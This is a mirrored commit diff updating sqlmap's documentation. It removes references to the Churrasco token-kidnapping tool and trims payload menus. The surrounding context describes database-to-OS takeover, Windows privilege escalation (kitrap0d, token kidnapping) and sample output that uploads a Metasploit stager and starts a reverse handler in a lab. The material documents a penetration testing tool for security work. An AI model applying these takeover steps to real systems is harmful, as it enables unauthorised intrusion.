mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-28 20:43:49 +03:00
Updated documentation according to r1460
This commit is contained in:
parent
7d8cc1a482
commit
c42c4982c3
|
@ -247,7 +247,7 @@ and the session user privileges.</LI>
|
||||||
</H2>
|
</H2>
|
||||||
|
|
||||||
<P>You can watch several demo videos, they are hosted on
|
<P>You can watch several demo videos, they are hosted on
|
||||||
<A HREF="http://www.youtube.com/user/inquisb#p/u">YouTube</A> and linked
|
<A HREF="http://www.youtube.com/user/inquisb#g/u">YouTube</A> and linked
|
||||||
from
|
from
|
||||||
<A HREF="http://sqlmap.sourceforge.net/demo.html">here</A>.</P>
|
<A HREF="http://sqlmap.sourceforge.net/demo.html">here</A>.</P>
|
||||||
|
|
||||||
|
@ -276,13 +276,12 @@ blind SQL injection</B>.
|
||||||
targets from
|
targets from
|
||||||
<A HREF="http://portswigger.net/suite/">Burp proxy</A>
|
<A HREF="http://portswigger.net/suite/">Burp proxy</A>
|
||||||
requests log file or
|
requests log file or
|
||||||
<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A>
|
<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A> <CODE>conversations/</CODE> folder, get the whole HTTP
|
||||||
<CODE>conversations/</CODE> folder, get the whole HTTP request from a text
|
request from a text file or get the list of targets by providing sqlmap
|
||||||
file or get the list of targets by providing sqlmap with a Google dork
|
with a Google dork which queries
|
||||||
which queries
|
<A HREF="http://www.google.com">Google</A> search engine and parses its results page. You can also
|
||||||
<A HREF="http://www.google.com">Google</A> search engine and
|
define a regular-expression based scope that is used to identify which of
|
||||||
parses its results page. You can also define a regular-expression based
|
the parsed addresses to test.
|
||||||
scope that is used to identify which of the parsed addresses to test.
|
|
||||||
</LI>
|
</LI>
|
||||||
<LI>Automatically tests all provided <B>GET</B> parameters,
|
<LI>Automatically tests all provided <B>GET</B> parameters,
|
||||||
<B>POST</B> parameters, HTTP <B>Cookie</B> header values and HTTP
|
<B>POST</B> parameters, HTTP <B>Cookie</B> header values and HTTP
|
||||||
|
@ -457,10 +456,8 @@ Metasploit's <CODE>getsystem</CODE> command which include, among others,
|
||||||
the
|
the
|
||||||
<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
|
<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
|
||||||
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>) or via
|
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>) or via
|
||||||
<A HREF="http://www.argeniss.com/research/TokenKidnapping.pdf">Windows Access Tokens kidnapping</A> by using either Meterpreter's
|
<A HREF="http://www.argeniss.com/research/TokenKidnapping.pdf">Windows Access Tokens kidnapping</A> by using Meterpreter's
|
||||||
<CODE>incognito</CODE> extension or <CODE>Churrasco</CODE> (
|
<CODE>incognito</CODE> extension.
|
||||||
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx">MS09-012</A>) stand-alone executable
|
|
||||||
as per user's choice.
|
|
||||||
</LI>
|
</LI>
|
||||||
<LI>Support to access (read/add/delete) Windows registry hives.</LI>
|
<LI>Support to access (read/add/delete) Windows registry hives.</LI>
|
||||||
</UL>
|
</UL>
|
||||||
|
@ -538,10 +535,8 @@ contains the working copy from the Subversion repository updated at the
|
||||||
time the sqlmap new version has been released.</LI>
|
time the sqlmap new version has been released.</LI>
|
||||||
<LI>The Debian and Red Hat installation packages (deb and rpm) are
|
<LI>The Debian and Red Hat installation packages (deb and rpm) are
|
||||||
compliant with the Linux distributions' packaging guidelines. This implies
|
compliant with the Linux distributions' packaging guidelines. This implies
|
||||||
that they do not support the update features and do not include
|
that they do not support the update features and do not include UPX (used
|
||||||
third-party softwares Churrasco (used to perform Windows token kidnapping,
|
to pack the Metasploit payload stager in some cases, see below).</LI>
|
||||||
see below) and UPX (used to pack the Metasploit payload stager in some
|
|
||||||
cases, see below).</LI>
|
|
||||||
<LI>The Windows binary package (exe) can't update itself and does not
|
<LI>The Windows binary package (exe) can't update itself and does not
|
||||||
support the takeover out-of-band features because they rely on
|
support the takeover out-of-band features because they rely on
|
||||||
Metasploit's <CODE>msfcli</CODE> which is not available for Windows.</LI>
|
Metasploit's <CODE>msfcli</CODE> which is not available for Windows.</LI>
|
||||||
|
@ -694,7 +689,7 @@ Options:
|
||||||
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
|
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
|
||||||
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
|
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
|
||||||
--os-bof Stored procedure buffer overflow exploitation
|
--os-bof Stored procedure buffer overflow exploitation
|
||||||
--priv-esc User priv escalation by abusing Windows access tokens
|
--priv-esc Database process' user privilege escalation
|
||||||
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
|
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
|
||||||
--tmp-path=TMPPATH Remote absolute path of temporary files directory
|
--tmp-path=TMPPATH Remote absolute path of temporary files directory
|
||||||
|
|
||||||
|
@ -4968,11 +4963,8 @@ via Metasploit's <CODE>getsystem</CODE> command which include, among others,
|
||||||
the
|
the
|
||||||
<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
|
<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
|
||||||
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>) or via
|
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>) or via
|
||||||
<A HREF="http://www.argeniss.com/research/TokenKidnapping.pdf">Windows Access Tokens kidnapping</A> by using either Meterpreter's
|
<A HREF="http://www.argeniss.com/research/TokenKidnapping.pdf">Windows Access Tokens kidnapping</A> by using Meterpreter's
|
||||||
<A HREF="http://sourceforge.net/projects/incognito/">incognito</A> extension or
|
<A HREF="http://sourceforge.net/projects/incognito/">incognito</A> extension.</P>
|
||||||
<A HREF="http://www.argeniss.com/research/Churrasco.zip">Churrasco</A>
|
|
||||||
(
|
|
||||||
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx">MS09-012</A>) stand-alone executable as per user's choice.</P>
|
|
||||||
|
|
||||||
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> running as
|
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> running as
|
||||||
<CODE>NETWORK SERVICE</CODE> on the target:</P>
|
<CODE>NETWORK SERVICE</CODE> on the target:</P>
|
||||||
|
@ -5023,9 +5015,7 @@ which payload encoding do you want to use?
|
||||||
[hh:mm:53] [INFO] creation in progress ..... done
|
[hh:mm:53] [INFO] creation in progress ..... done
|
||||||
[hh:mm:58] [INFO] compression in progress . done
|
[hh:mm:58] [INFO] compression in progress . done
|
||||||
[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
|
[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
|
||||||
do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its
|
[hh:mm:05] [INFO] running Metasploit Framework 3 command line interface locally, wait..
|
||||||
argument so that it will be started as SYSTEM? [y/N]
|
|
||||||
[hh:mm:22] [INFO] running Metasploit Framework 3 command line interface locally, wait..
|
|
||||||
[*] Please wait while we load the module tree...
|
[*] Please wait while we load the module tree...
|
||||||
[*] Started reverse handler on 172.16.213.1:44780
|
[*] Started reverse handler on 172.16.213.1:44780
|
||||||
[*] Starting the payload handler...
|
[*] Starting the payload handler...
|
||||||
|
@ -5144,11 +5134,9 @@ send the NTLM session hash when connecting to a SMB service
|
||||||
[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
|
[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
|
||||||
[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
|
[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
|
||||||
[hh:mm:16] [INFO] which payload do you want to use?
|
[hh:mm:16] [INFO] which payload do you want to use?
|
||||||
[1] Reflective Meterpreter (default)
|
[1] Meterpreter (default)
|
||||||
[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
|
[2] Shell
|
||||||
[3] Shell
|
[3] VNC
|
||||||
[4] Reflective VNC
|
|
||||||
[5] PatchUp VNC (only from Metasploit development revision 6742)
|
|
||||||
> 1
|
> 1
|
||||||
[hh:mm:16] [INFO] which SMB port do you want to use?
|
[hh:mm:16] [INFO] which SMB port do you want to use?
|
||||||
[1] 139/TCP (default)
|
[1] 139/TCP (default)
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
|
@ -407,11 +407,8 @@ name="kitrap0d"> technique (<htmlurl
|
||||||
url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
|
url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
|
||||||
name="MS10-015">) or via <htmlurl
|
name="MS10-015">) or via <htmlurl
|
||||||
url="http://www.argeniss.com/research/TokenKidnapping.pdf"
|
url="http://www.argeniss.com/research/TokenKidnapping.pdf"
|
||||||
name="Windows Access Tokens kidnapping"> by using either Meterpreter's
|
name="Windows Access Tokens kidnapping"> by using Meterpreter's
|
||||||
<tt>incognito</tt> extension or <tt>Churrasco</tt> (<htmlurl
|
<tt>incognito</tt> extension.
|
||||||
url="http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx"
|
|
||||||
name="MS09-012">) stand-alone executable
|
|
||||||
as per user's choice.
|
|
||||||
|
|
||||||
<item>Support to access (read/add/delete) Windows registry hives.
|
<item>Support to access (read/add/delete) Windows registry hives.
|
||||||
</itemize>
|
</itemize>
|
||||||
|
@ -484,10 +481,8 @@ contains the working copy from the Subversion repository updated at the
|
||||||
time the sqlmap new version has been released.
|
time the sqlmap new version has been released.
|
||||||
<item>The Debian and Red Hat installation packages (deb and rpm) are
|
<item>The Debian and Red Hat installation packages (deb and rpm) are
|
||||||
compliant with the Linux distributions' packaging guidelines. This implies
|
compliant with the Linux distributions' packaging guidelines. This implies
|
||||||
that they do not support the update features and do not include
|
that they do not support the update features and do not include UPX (used
|
||||||
third-party softwares Churrasco (used to perform Windows token kidnapping,
|
to pack the Metasploit payload stager in some cases, see below).
|
||||||
see below) and UPX (used to pack the Metasploit payload stager in some
|
|
||||||
cases, see below).
|
|
||||||
<item>The Windows binary package (exe) can't update itself and does not
|
<item>The Windows binary package (exe) can't update itself and does not
|
||||||
support the takeover out-of-band features because they rely on
|
support the takeover out-of-band features because they rely on
|
||||||
Metasploit's <tt>msfcli</tt> which is not available for Windows.
|
Metasploit's <tt>msfcli</tt> which is not available for Windows.
|
||||||
|
@ -4872,12 +4867,9 @@ name="kitrap0d"> technique (<htmlurl
|
||||||
url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
|
url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
|
||||||
name="MS10-015">) or via <htmlurl
|
name="MS10-015">) or via <htmlurl
|
||||||
url="http://www.argeniss.com/research/TokenKidnapping.pdf"
|
url="http://www.argeniss.com/research/TokenKidnapping.pdf"
|
||||||
name="Windows Access Tokens kidnapping"> by using either Meterpreter's
|
name="Windows Access Tokens kidnapping"> by using Meterpreter's
|
||||||
<htmlurl url="http://sourceforge.net/projects/incognito/"
|
<htmlurl url="http://sourceforge.net/projects/incognito/"
|
||||||
name="incognito"> extension or <htmlurl
|
name="incognito"> extension.
|
||||||
url="http://www.argeniss.com/research/Churrasco.zip" name="Churrasco">
|
|
||||||
(<htmlurl url="http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx"
|
|
||||||
name="MS09-012">) stand-alone executable as per user's choice.
|
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> running as
|
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> running as
|
||||||
|
@ -4928,9 +4920,7 @@ which payload encoding do you want to use?
|
||||||
[hh:mm:53] [INFO] creation in progress ..... done
|
[hh:mm:53] [INFO] creation in progress ..... done
|
||||||
[hh:mm:58] [INFO] compression in progress . done
|
[hh:mm:58] [INFO] compression in progress . done
|
||||||
[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
|
[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
|
||||||
do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its
|
[hh:mm:05] [INFO] running Metasploit Framework 3 command line interface locally, wait..
|
||||||
argument so that it will be started as SYSTEM? [y/N]
|
|
||||||
[hh:mm:22] [INFO] running Metasploit Framework 3 command line interface locally, wait..
|
|
||||||
[*] Please wait while we load the module tree...
|
[*] Please wait while we load the module tree...
|
||||||
[*] Started reverse handler on 172.16.213.1:44780
|
[*] Started reverse handler on 172.16.213.1:44780
|
||||||
[*] Starting the payload handler...
|
[*] Starting the payload handler...
|
||||||
|
|
Loading…
Reference in New Issue
Block a user